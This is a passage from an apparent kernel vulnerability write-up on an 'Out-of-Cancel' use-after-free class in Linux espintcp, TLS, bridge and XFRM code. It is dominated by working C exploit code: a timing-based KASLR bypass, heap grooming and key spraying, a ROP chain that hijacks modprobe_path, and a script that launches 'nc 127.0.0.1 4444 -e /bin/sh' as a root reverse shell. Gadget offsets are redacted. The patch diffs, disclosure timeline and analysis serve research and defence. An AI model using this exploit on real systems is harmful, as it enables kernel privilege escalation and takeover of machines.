"mov %%rax, %1\n\t"
"mfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}
void prefetch(void* p)
{
asm volatile (
"prefetchnta (%0)\n"
"prefetcht2 (%0)\n"
: : "r" (p));
}
size_t flushandreload(void* addr)
{
size_t time = rdtsc_begin();
prefetch(addr);
size_t delta = rdtsc_end() - time;
return delta;
}
#define PREFETCH_ITER 25
#define KASLR_BYPASS_INTEL 1
#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
int bypass_kaslr(uint64_t base) {
if (!base) {
#ifdef KASLR_BYPASS_INTEL
#define OFFSET 0
#define START (0xffffffff81000000ull + OFFSET)
#define END (0xffffffffD0000000ull + OFFSET)
#define STEP 0x0000000001000000ull
while (1) {
uint64_t bases[7] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (uint64_t)ti;
}
for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
uint64_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}
size_t minv = ~0;
size_t mini = -1;
for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
if (times[ti] < minv) {
mini = ti;
minv = times[ti];
}
}
if (mini < 0) {
return -1;
}
bases[vote] = addrs[mini];
}
int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}
c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
base -= OFFSET;
goto got_base;
}
}
#else
#define START (0xffffffff81000000ull)
#define END (0xffffffffc0000000ull)
#define STEP 0x0000000000200000ull
#define NUM_TRIALS 7
// largest contiguous mapped area at the beginning of _stext
#define WINDOW_SIZE 11
while (1) {
uint64_t bases[NUM_TRIALS] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (uint64_t)ti;
}
for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
uint64_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}
uint64_t max = 0;
int max_i = 0;
for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
uint64_t sum = 0;
for (int i = 0; i < WINDOW_SIZE; i++) {
sum += times[ti + i];
}
if (sum > max) {
max = sum;
max_i = ti;
}
}
bases[vote] = addrs[max_i];
}
int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}
c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
goto got_base;
}
}
#endif
}
got_base:
kbase = base;
return 0;
}
inline static int _pin_to_cpu(int id)
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(id, &set);
return sched_setaffinity(getpid(), sizeof(set), &set);
}
static void epoll_ctl_add(int epfd, int fd, uint32_t events)
{
struct epoll_event ev;
ev.events = events;
ev.data.fd = fd;
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
}
void do_epoll_enqueue(int fd)
{
int cfd[2];
socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
for (int k = 0; k < 0x10; k++)
{
if (fork() == 0)
{
for (int i = 0; i < 0x300; i++)
{
epoll_timefds[i] = dup(fd);
}
for (int i = 0; i < 0x2c0; i++)
{
epoll_fds[i] = epoll_create(0x1);
}
for (int i = 0; i < 0x2c0; i++)
{
for (int j = 0; j < 0x300; j++)
{
epoll_ctl_add(epoll_fds[i], epoll_timefds[j], 0);
}
}
write(cfd[1], tfd_buf, 1);
raise(SIGSTOP);
}
read(cfd[0], tfd_buf, 1);
}
close(cfd[0]);
close(cfd[1]);
}
static int enable_espintcp(int fd, const char *tag)
{
const char *ulp = "espintcp";
int ret = setsockopt(fd, IPPROTO_TCP, TCP_ULP, ulp, strlen(ulp));
if (ret < 0) {
fprintf(stderr, "[%s] setsockopt(TCP_ULP, \"espintcp\") failed: %s\n",
tag, strerror(errno));
return -1;
}
return 0;
}
void heap_grooming(void) {
for (int i = 0; i < GROOMING_COUNT; i++) {
fds[i] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
enable_espintcp(fds[i], "grooming");
}
}
long add_key(const char *type, const char *description, const void *payload, size_t plen, int32_t ringid) {
return syscall(__NR_add_key, type, description, payload, plen, ringid);
}
void *key_spray(void *arg)
{
char desc[64];
int i;
long key_id;
for (i = 0; i < KEY_SPRAY_COUNT; i++) {
snprintf(desc, sizeof(desc), "spray_key_%d", i);
key_id = add_key("user", desc, (void *)ctx, sizeof(struct espintcp_ctx), KEY_SPEC_PROCESS_KEYRING);
if (key_id < 0) {
break;
}
}
return NULL;
}
static int run_server(int s2c[], int c2s[])
{
int listen_fd = -1, conn_fd = -1;
struct sockaddr_in addr, cliaddr;
socklen_t cli_len = sizeof(cliaddr);
char buf[1024];
ssize_t n;
char c = 'x';
pthread_t th;
struct sockaddr_alg sa;
int alg_fd;
_pin_to_cpu(HELPER_CPU);
listen_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listen_fd < 0) {
perror("[server] socket()");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(5000);
if (bind(listen_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("[server] bind()");
return -1;
}
if (listen(listen_fd, 16) < 0) {
perror("[server] listen()");
return -1;
}
conn_fd = accept(listen_fd, (struct sockaddr *)&cliaddr, &cli_len);
if (conn_fd < 0) {
perror("[server] accept()");
return -1;
}
int flags = fcntl(conn_fd, F_GETFL, 0);
fcntl(conn_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(conn_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
unsigned char msg[7];
msg[0] = 0x00; msg[1] = 0x07; // full_len = 7
msg[2] = 0x00; msg[3] = 0x00; msg[4] = 0x00; msg[5] = 0x00; // marker = 0
msg[6] = 0x01; // extra
for (int i = 0; i < IKE_COUNT; i++) {
ssize_t n = write(conn_fd, msg, sizeof(msg));
}
for (int i = 0; i < RCV_QUEUE_COUNT; i++) {
ssize_t n = write(conn_fd, buf, 7);
}
printf("step 2\n");
write(s2c[1], &c, 1);
read(c2s[0], &c, 1);
printf("step 5\n");
usleep(DELAY_STAGE_2);
if (pthread_create(&th, &attr, key_spray, NULL) != 0) {
perror("pthread_create()");
return -1;
}
pthread_join(th, NULL);
close(conn_fd);
close(listen_fd);
return 0;
}
static int run_client(int s2c[], int c2s[])
{
int fd;
struct sockaddr_in addr;
char buf[1024];
char c;
sleep(1);
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (fd < 0) {
perror("[client] socket");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(5000);
printf("[client] connect() before\n");
if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("[client] connect");
return -1;
}
printf("[client] connect() after - connected to 127.0.0.1:5000\n");
int sndbuf = 1024;
if (setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf)) < 0) {
perror("[client] setsockopt(SO_SNDBUF)");
} else {
printf("[client] SO_SNDBUF set to %d bytes\n", sndbuf);
}
if (enable_espintcp(fd, "client") < 0) {
return -1;
}
int flags = fcntl(fd, F_GETFL, 0);
fcntl(fd, F_SETFL, flags | O_NONBLOCK);
int rcvbuf = 900*1024*1024;
setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf));
printf("step 1\n");
read(s2c[0], &c, 1);
printf("step 3\n");
memset(buf, 'A', sizeof(buf));
for (int i = 0; i < SENDMSG_COUNT; i++) {
ssize_t n = write(fd, buf, sizeof(buf));
}
printf("step 4\n");
write(c2s[1], &c, 1);
usleep(DELAY_STAGE_1);
struct itimerspec new = {.it_value.tv_nsec = 11000};
timerfd_settime(g_tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
close(fd);
return 0;
}
int race_trigger(void *arg)
{
int s2c[2]; // parent -> child
int c2s[2]; // child -> parent
status_trig = TRIG_ERROR;
pipe(s2c);
pipe(c2s);
_pin_to_cpu(MAIN_CPU);
heap_grooming();
pid_t pid = fork();
if (pid == 0) {
// child: client
close(s2c[1]);
close(c2s[0]);
return run_client(s2c, c2s);
} else {
// parent: server
int status = 0;
int ret;
close(s2c[0]);
close(c2s[1]);
ret = run_server(s2c, c2s);
waitpid(pid, &status, 0);
printf("[main] client exited with status %d\n", status);
usleep(3000);
status_trig = TRIG_RETRY;
return ret;
}
return 0;
}
#define MODPROBE_SCRIPT "#!/bin/sh\nnc 127.0.0.1 4444 -e /bin/sh\n"
#define WORK_STRUCT_PWQ 4
unsigned long long int net_families_can;
void *modprobe_path;
void *push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
void *pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
void *pop_rbx_ret;
void *_copy_from_user;
void *mdelay;
unsigned long long int fake_net_families_can;
void *bind_thread(void *arg)
{
struct sockaddr_alg sa;
int alg_fd;
alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "V4bel");
while (1) {
usleep(500000);
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));
}
}
int prepare_rop_payload()
{
char fake_modprobe[40] = {0};
pid_t pid = getpid();
pthread_attr_t attr_bind;
cpu_set_t cpus_bind;
pthread_t th_bind;
int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
dprintf(modprobe_script_fd, MODPROBE_SCRIPT);
snprintf(fake_modprobe, sizeof(fake_modprobe), "/proc/%i/fd/%i", pid, modprobe_script_fd);
ctx = malloc(sizeof(struct espintcp_ctx));
if (!ctx) {
perror("malloc()");
return -1;
}
memset(ctx, 0, sizeof(struct espintcp_ctx));
fake_net_families_can = (net_families_can - 8) | WORK_STRUCT_PWQ;
ctx->work.entry.next = modprobe_path;
ctx->work.entry.prev = modprobe_path;
ctx->work.data = (void *)fake_net_families_can;
ctx->work.func = push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
int t = 0;
ctx->payload[t++] = pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
ctx->payload[t++] = modprobe_path;
ctx->payload[t++] = (void *)fake_modprobe;
ctx->payload[t++] = (void *)strlen(fake_modprobe);
ctx->payload[t++] = 0;
ctx->payload[t++] = _copy_from_user;
ctx->payload[t++] = pop_rbx_ret;
ctx->payload[t++] = (void *)30000;
ctx->payload[t++] = mdelay;
ctx->payload[t++] = 0;
pthread_attr_init(&attr_bind);
CPU_ZERO(&cpus_bind);
CPU_SET(1, &cpus_bind);
if (pthread_attr_setaffinity_np(&attr_bind, sizeof(cpu_set_t), &cpus_bind) != 0) {
perror("pthread_attr_setaffinity_np()");
return -1;
}
if (pthread_create(&th_bind, &attr_bind, bind_thread, NULL) != 0) {
perror("pthread_create()");
return -1;
}
return 0;
}
void prefetch_attack()
{
uint64_t bases[PREFETCH_ITER] = {0,};
for (int i = 0 ; i < PREFETCH_ITER; i++) {
bypass_kaslr(0);
bases[i] = kbase;
}
kbase = find_min(bases, PREFETCH_ITER);
printf("kbase: 0x%lx\n", kbase);
net_families_can = kbase + 0x... + 0xe8;
modprobe_path = (void *)(kbase + 0x...);
push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret = (void *)(kbase + 0x...);
pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret = (void *)(kbase + 0x...);
pop_rbx_ret = (void *)(kbase + 0x...);
_copy_from_user = (void *)(kbase + 0x...);
mdelay = (void *)(kbase + 0x...);
}
int main(int argc, void *argv[])
{
prefetch_attack();
if (prepare_rop_payload()) {
perror("prepare_rop_payload()");
return -1;
}
pthread_attr_init(&attr);
CPU_ZERO(&cpus);
CPU_SET(0, &cpus);
if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &cpus) != 0) {
perror("pthread_attr_setaffinity_np()");
return -1;
}
g_tfd = timerfd_create(CLOCK_MONOTONIC, 0);
do_epoll_enqueue(g_tfd);
trigger_stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
FAIL_IF(trigger_stack == MAP_FAILED);
trigger_stack += 0x8000;
do {
int race_trigger_pid = clone(race_trigger, trigger_stack, CLONE_VM | SIGCHLD, NULL);
FAIL_IF(race_trigger_pid < 0);
FAIL_IF(waitpid(race_trigger_pid, NULL, 0) < 0);
} while (status_trig == TRIG_RETRY);
return 0;
}
Because almost every step in this race scenario behaves non-deterministically, the delay values inserted at each stage have to be tuned manually for the target environment. For example, when testing in a VMware guest, the APIC timer is often observed to arrive much later than expected, which appears to be one of the side effects caused by vCPU preemption.
This is also why I did not try to stabilize the exploit by measuring execution time with rdtsc and dynamically adjusting the relative delays between stages based on that value. Even in the same environment, using the same delays (even with busy-wait loops) does not guarantee the same execution order each time. It is not possible to predict exactly when softirqs or hardirqs will be handled, or when a context switch will complete.
Patching espintcp
This espintcp vulnerability was fixed by changing cancel_work_sync() to disable_work_sync() in commit e1512c1db9e8.
diff --git a/net/xfrm/espintcp.c b/net/xfrm/espintcp.c
index bf744ac9d5a7..8709df716e98 100644
--- a/net/xfrm/espintcp.c
+++ b/net/xfrm/espintcp.c
@@ -536,7 +536,7 @@ static void espintcp_close(struct sock *sk, long timeout)
sk->sk_prot = &tcp_prot;
barrier();
- cancel_work_sync(&ctx->work);
+ disable_work_sync(&ctx->work);
strp_done(&ctx->strp);
skb_queue_purge(&ctx->out_queue);
The disclosure timeline is as follows:
- 2026-02-03: Submitted the vulnerability report to security@kernel.org
- 2026-02-16: Submitted the v1 patch to the public netdev mailing list
- 2026-02-27: The patch was merged into the mainline kernel
Generalizing Out-of-Cancel
Issues belonging to this bug class are not limited to espintcp, and the same pattern can be found across the networking subsystem.
TLS TX Cancellation Race (CVE-2026-23240)
In net/tls/tls_sw.c, the function tls_sw_cancel_work_tx() calls cancel_delayed_work_sync() to cancel ctx->tx_work.work. As in the espintcp case, tls_write_space(), which is invoked from the ->sk_write_space() path, can re-schedule ctx->tx_work.work, leaving room for a race condition.
CVE-2026-23240 was fixed in commit 7bb09315f93d as follows:
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 9937d4c810f2..b1fa62de9dab 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -2533,7 +2533,7 @@ void tls_sw_cancel_work_tx(struct tls_context *tls_ctx)
set_bit(BIT_TX_CLOSING, &ctx->tx_bitmask);
set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask);
- cancel_delayed_work_sync(&ctx->tx_work.work);
+ disable_delayed_work_sync(&ctx->tx_work.work);
}
void tls_sw_release_resources_tx(struct sock *sk)
Bridge CFM Cancellation Race
In net/bridge/br_cfm.c, the function br_cfm_cc_peer_mep_remove() calls cancel_delayed_work_sync() to cancel peer_mep->ccm_rx_dwork. During this process, br_cfm_frame_rx(), which runs in softirq context, can re-schedule peer_mep->ccm_rx_dwork via ccm_rx_timer_start() upon CCM frame reception, leaving room for a race condition where the work is re-queued between the return of cancel_delayed_work_sync() and kfree_rcu().
This vulnerability was patched in 3715a0085531 as follows.
diff --git a/net/bridge/br_cfm.c b/net/bridge/br_cfm.c
index 2c70fe47de38..118c7ea48c35 100644
--- a/net/bridge/br_cfm.c
+++ b/net/bridge/br_cfm.c
@@ -576,7 +576,7 @@ static void mep_delete_implementation(struct net_bridge *br,
/* Empty and free peer MEP list */
hlist_for_each_entry_safe(peer_mep, n_store, &mep->peer_mep_list, head) {
- cancel_delayed_work_sync(&peer_mep->ccm_rx_dwork);
+ disable_delayed_work_sync(&peer_mep->ccm_rx_dwork);
hlist_del_rcu(&peer_mep->head);
kfree_rcu(peer_mep, rcu);
}
@@ -732,7 +732,7 @@ int br_cfm_cc_peer_mep_remove(struct net_bridge *br, const u32 instance,
return -ENOENT;
}
- cc_peer_disable(peer_mep);
+ disable_delayed_work_sync(&peer_mep->ccm_rx_dwork);
hlist_del_rcu(&peer_mep->head);
kfree_rcu(peer_mep, rcu);
XFRM Cancellation Race
In net/xfrm/xfrm_nat_keepalive.c, the function xfrm_nat_keepalive_net_fini() calls cancel_delayed_work_sync() to cancel net->xfrm.nat_keepalive_work. During this process, xfrm_state_fini(), which is called subsequently, flushes remaining states via __xfrm_state_delete(), causing xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work, leaving room for a race condition where the work executes on freed memory after the network namespace structure has been deallocated.
This vulnerability was patched in ipsec tree daf8e3b253aa as follows.
diff --git a/net/xfrm/xfrm_nat_keepalive.c b/net/xfrm/xfrm_nat_keepalive.c
index ebf95d48e86c..1856beee0149 100644
--- a/net/xfrm/xfrm_nat_keepalive.c
+++ b/net/xfrm/xfrm_nat_keepalive.c
@@ -261,7 +261,7 @@ int __net_init xfrm_nat_keepalive_net_init(struct net *net)
int xfrm_nat_keepalive_net_fini(struct net *net)
{
- cancel_delayed_work_sync(&net->xfrm.nat_keepalive_work);
+ disable_delayed_work_sync(&net->xfrm.nat_keepalive_work);
return 0;
}
In addition to this, significantly more vulnerabilities are currently being worked on. This will be updated as patches become publicly available.
Conclusion
In this work, a race-based vulnerability class arising from the usage patterns of the cancel_work_sync() and cancel_delayed_work_sync() APIs is organized under the name Out-of-Cancel and it is shown that the same issue can repeatedly appear in multiple ULP teardown paths, including espintcp. The core of this bug class is that “cancellation” does not guarantee that a work item will never be scheduled again, which creates a critical gap between object lifetime management and worker scheduling.
As seen in real cases, simply calling a cancellation API is not enough to block the race, and an explicit step to disable the work item is required. This is also reflected in the fact that different code paths, such as espintcp, TLS, Bridge and XFRM, all converge on the same direction of fixes. This pattern suggests that the problem is not confined to a specific subsystem, but is a structural issue that needs to be revisited across asynchronous work cancellation mechanisms in general.
Out-of-Cancel is less about an implementation mistake and more about a subtle mismatch between the semantics of the API and how it is used. In future code that relies on similar asynchronous execution models, it will be necessary to draw a clearer line between “cancellation” and “disabling”, and to explicitly validate how these operations interact with object lifetimes.
When such a mismatch occurs, a worker may still be scheduled after its associated object has been freed, eventually reaching process_one_work() in the kworker context. If the freed object is reallocated under attacker control, this can lead to RIP control, making it a powerful bug class in the Linux kernel.
These vulnerabilities typically surface in object teardown paths such as close, where object destruction intersects with asynchronous work cancellation. Exploiting them therefore requires arranging for the object to be freed and reclaimed before the worker actually runs. As demonstrated in the espintcp race scenario, an exploit can be constructed by carefully combining subsystem-specific teardown logic with the kernel’s interleaving behavior.